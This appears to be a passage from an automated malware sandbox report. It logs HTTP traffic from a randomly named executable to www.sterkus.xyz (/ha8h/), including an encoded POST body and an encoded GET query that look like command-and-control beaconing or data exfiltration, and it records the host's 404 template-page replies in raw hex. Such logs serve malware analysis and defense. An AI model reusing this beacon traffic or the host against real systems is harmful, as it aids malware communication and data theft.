                                                                                                            Oct 7, 2024 15:56:15.161559105 CEST1236INData Raw: 2f 68 65 61 64 65 72 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a
                                                                                                            Data Ascii: /header.jpg" alt=""> </div> </div> </div> ... Header End --> ... Search Start --> <div class="container-fluid bg-primary mb-5 wow fadeIn" data-wow-delay="0.1s" style="padd
                                                                                                            Oct 7, 2024 15:56:15.161592007 CEST1236INData Raw: 20 20 3c 73 65 6c 65 63 74 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 73 65 6c 65 63 74 20 62 6f 72 64 65 72 2d 30 20 70 79 2d 33 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <select class="form-select border-0 py-3"> <option selected>Location</option> <option value="1">Location 1</option> <option value=
                                                                                                            Oct 7, 2024 15:56:15.161624908 CEST896INData Raw: 6d 62 2d 34 22 3e 57 65 e2 80 99 72 65 20 73 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 68 61 76 65 20 6c 6f 6f 6b 65 64 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 69 6e 20 6f 75 72 20 77 65 62 73 69 74 65 21 20 4d
                                                                                                            Data Ascii: mb-4">Were sorry, the page you have looked for does not exist in our website! Maybe go to our home page or try to use a search?</p> <a class="btn btn-primary py-3 px-5" href="">Go Back To Home</a>
                                                                                                            Oct 7, 2024 15:56:15.161659956 CEST1236INData Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                                                                            Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                                                                            Oct 7, 2024 15:56:15.161695957 CEST1236INData Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                                                                            Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">
                                                                                                            Oct 7, 2024 15:56:15.166661978 CEST1236INData Raw: 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20
                                                                                                            Data Ascii: ="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-6.jpg" alt=""> </div> </div> </div> <div c


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.949990209.74.95.29806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:17.271444082 CEST1702OUTPOST /ha8h/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1232
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: www.sterkus.xyz
                                                                                                            Origin: http://www.sterkus.xyz
                                                                                                            Referer: http://www.sterkus.xyz/ha8h/
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Data Raw: 45 6a 4c 64 55 4a 4a 3d 43 5a 5a 67 5a 38 77 52 47 7a 33 68 5a 4e 46 41 70 76 51 59 67 46 2b 76 61 50 45 64 58 4a 59 52 58 6f 34 34 62 66 4d 58 36 43 69 6f 69 2f 78 35 78 7a 72 52 4c 41 76 48 53 49 4f 34 72 69 68 70 67 6f 68 6d 47 39 33 64 35 38 31 50 58 6e 57 43 46 77 37 70 78 77 59 65 70 6a 79 62 46 4c 46 74 72 73 45 62 46 50 6b 47 33 54 46 6f 56 31 57 6e 63 67 4d 43 2b 71 51 55 4f 72 37 7a 73 6e 44 52 54 6b 79 45 35 6a 2f 4c 63 53 79 72 62 41 57 2f 4b 38 41 69 64 32 2f 4d 6c 43 67 2b 43 4a 39 5a 72 74 68 38 79 78 79 61 4d 51 50 31 36 75 76 32 44 72 64 65 46 35 63 70 71 58 78 31 52 39 65 55 72 6d 5a 46 44 33 59 79 76 35 41 37 2f 76 34 51 67 4a 37 53 41 59 4c 4e 69 64 36 43 67 33 77 71 4b 4e 6d 72 2f 68 64 57 71 54 71 47 42 68 50 33 72 66 4d 5a 75 55 73 71 69 6b 41 68 75 44 54 62 41 6f 32 72 77 44 4d 73 58 73 61 75 69 71 59 71 53 6b 34 2f 52 51 76 6b 57 42 6b 6e 58 4b 39 73 36 43 73 35 79 64 79 65 33 58 61 53 59 66 2b 55 65 50 66 32 75 56 6a 39 75 2f 38 55 37 33 59 55 65 5a 76 72 57 6f 46 46 69 57 [TRUNCATED]
                                                                                                            Data Ascii: EjLdUJJ=CZZgZ8wRGz3hZNFApvQYgF+vaPEdXJYRXo44bfMX6Cioi/x5xzrRLAvHSIO4rihpgohmG93d581PXnWCFw7pxwYepjybFLFtrsEbFPkG3TFoV1WncgMC+qQUOr7zsnDRTkyE5j/LcSyrbAW/K8Aid2/MlCg+CJ9Zrth8yxyaMQP16uv2DrdeF5cpqXx1R9eUrmZFD3Yyv5A7/v4QgJ7SAYLNid6Cg3wqKNmr/hdWqTqGBhP3rfMZuUsqikAhuDTbAo2rwDMsXsauiqYqSk4/RQvkWBknXK9s6Cs5ydye3XaSYf+UePf2uVj9u/8U73YUeZvrWoFFiWdFA2nTIzObKfST8xZ6wjDcUZjRxQRrRGDQoxdPfSgLtV/6tKxPqLaGVvY2fi/yEOBVvyViEqZi1pEbCEGZlQwTuL9LZp2W9MXXawIVcf18DEL/zD8O3FbK2T8W4jERZtaiOpneHjYqybhYRMcR7XWbq+oAf2xKQPqwqqJde/EPkH+stcg+wpZiouDwBoT+y6E5MvMKTbrZ/jMzbb61w+6mTcqzw8k54tIWcPbWhZx+C74YUdG4iWzneuD/ccRCp9met1jpLu/p6HBveic7aZWHA533IrnB2bJ1/HH0Yffzm+WkymY89FeoEa7q0ln0syoWYK5CcICgg5lEW7jUe2luf/+0zDY6Pwtd69wh6dcrD+b8CrSxxK4CbYgmnk95+s+QimBnutQOW9g26Za9B+EHgNe31wS7ARBGkRmJymvIxKDwXy1o+p2O94aqOoIgLRf7M6MgPO9wS5Hjksvky0tiljFHri1ST7twqluK6OwxzqhjPwGhhqj0rZKvXGymLGh0Z3jQ7lCjHWGtwUbpv3kF25ZosdO335g5mEjyTh8tcTPfMOw/rR7ThfKHe2XYf4UDQfaa/LUqXm74EFGM01LHmlA5svrtFB1KaJb4hJsbWlxqkXlU9bWffeMWNSTj5WPcclBZjRD6pk7a1TLtvJSkkMJ96xB8dv9z [TRUNCATED]
                                                                                                            Oct 7, 2024 15:56:18.213613987 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 07 Oct 2024 13:56:17 GMT
                                                                                                            Server: Apache
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Content-Length: 13928
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                                                            Oct 7, 2024 15:56:18.213640928 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                                                                            Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                                                                            Oct 7, 2024 15:56:18.213654041 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                                                                            Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
                                                                                                            Oct 7, 2024 15:56:18.213665009 CEST1236INData Raw: 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72
                                                                                                            Data Ascii: s="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0">
                                                                                                            Oct 7, 2024 15:56:18.213676929 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <li class="breadcrumb-item"><a href="#">Home</a></li> <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">4
                                                                                                            Oct 7, 2024 15:56:18.213687897 CEST1236INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c
                                                                                                            Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
                                                                                                            Oct 7, 2024 15:56:18.213700056 CEST1236INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 22 3e 0d 0a 20 20 20 20
                                                                                                            Data Ascii: div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div> </div>
                                                                                                            Oct 7, 2024 15:56:18.213711977 CEST448INData Raw: 70 74 2d 35 20 6d 74 2d 35 20 77 6f 77 20 66 61 64 65 49 6e 22 20 64 61 74 61 2d 77 6f 77 2d 64 65 6c 61 79 3d 22 30 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79
                                                                                                            Data Ascii: pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Get In Touc
                                                                                                            Oct 7, 2024 15:56:18.213735104 CEST1236INData Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                                                                            Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                                                                            Oct 7, 2024 15:56:18.213746071 CEST1236INData Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                                                                            Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">
                                                                                                            Oct 7, 2024 15:56:18.213757038 CEST1236INData Raw: 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64 20 62 67 2d 6c 69 67 68 74 20
                                                                                                            Data Ascii: ="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-6.jpg" alt=""> </div> </div> </div> <div c
                                                                                                            Oct 7, 2024 15:56:18.213973999 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 07 Oct 2024 13:56:17 GMT
                                                                                                            Server: Apache
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Content-Length: 13928
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.949991209.74.95.29806568C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Oct 7, 2024 15:56:19.803411007 CEST411OUTGET /ha8h/?WLUDu=SXq8yrvPVd3tf&EjLdUJJ=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX6/3MPvQCQPMFuzfo+VK5cq25Wd2+yKQ== HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en
                                                                                                            Connection: close
                                                                                                            Host: www.sterkus.xyz
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                                                            Oct 7, 2024 15:56:20.385941982 CEST1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 07 Oct 2024 13:56:20 GMT
                                                                                                            Server: Apache
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            Content-Length: 13928
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                                                            Oct 7, 2024 15:56:20.386014938 CEST1236INData Raw: 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c
                                                                                                            Data Ascii: el="stylesheet"> <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet -->
                                                                                                            Oct 7, 2024 15:56:20.386074066 CEST1236INData Raw: 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: </div> <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span
                                                                                                            Oct 7, 2024 15:56:20.386109114 CEST1236INData Raw: 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 63 6c 61
                                                                                                            Data Ascii: <div class="nav-item dropdown"> <a href="#" class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0">
                                                                                                            Oct 7, 2024 15:56:20.386145115 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20
                                                                                                            Data Ascii: <li class="breadcrumb-item"><a href="#">Home</a></li> <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-c
                                                                                                            Oct 7, 2024 15:56:20.386178017 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74
                                                                                                            Data Ascii: <div class="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md
                                                                                                            Oct 7, 2024 15:56:20.386210918 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63
                                                                                                            Data Ascii: </div> </div> <div class="col-md-2"> <button class="btn btn-dark border-0 w-100 py-3">Search</button> </div> </div>
                                                                                                            Oct 7, 2024 15:56:20.386260986 CEST448INData Raw: 68 69 74 65 2d 35 30 20 66 6f 6f 74 65 72 20 70 74 2d 35 20 6d 74 2d 35 20 77 6f 77 20 66 61 64 65 49 6e 22 20 64 61 74 61 2d 77 6f 77 2d 64 65 6c 61 79 3d 22 30 2e 31 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                            Data Ascii: hite-50 footer pt-5 mt-5 wow fadeIn" data-wow-delay="0.1s"> <div class="container py-5"> <div class="row g-5"> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb
                                                                                                            Oct 7, 2024 15:56:20.386296034 CEST1236INData Raw: 22 3e 3c 2f 69 3e 2b 30 31 32 20 33 34 35 20 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d
                                                                                                            Data Ascii: "></i>+012 345 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-socia
                                                                                                            Oct 7, 2024 15:56:20.386334896 CEST1236INData Raw: 22 20 68 72 65 66 3d 22 22 3e 54 65 72 6d 73 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                            Data Ascii: " href="">Terms & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">
